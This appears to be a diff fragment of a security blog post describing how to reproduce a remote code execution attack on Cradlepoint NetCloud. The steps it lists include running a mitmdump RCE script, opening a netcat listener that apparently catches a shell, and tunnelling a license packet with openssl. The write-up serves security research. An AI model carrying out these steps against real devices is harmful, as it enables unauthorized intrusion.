stulle123/stulle123.github.io/content/posts/cradlepoint/netcloud.md

 - In the script change the IP address to `127.0.0.1` and the payload's Python interpreter to just `python` or `python3`
 - Start `mitmdump` in one terminal window: `$ mitmdump --rawtcp --tcp-hosts ".*" -s mitmproxy_netcloud_rce.py`
-- In another window start a netcat listener
+- In another window, start a netcat listener
 - Tunnel a [license packet](https://github.com/veganmosfet/Rooting-the-Cradlepoint-IBR600/blob/main/netcloud/scripts/license_packet_TO_netcloud.bin): `$ cat license_packet_TO_netcloud.bin | openssl s_client -connect "google.com:443" -proxy localhost:8080`

 {{< box info >}}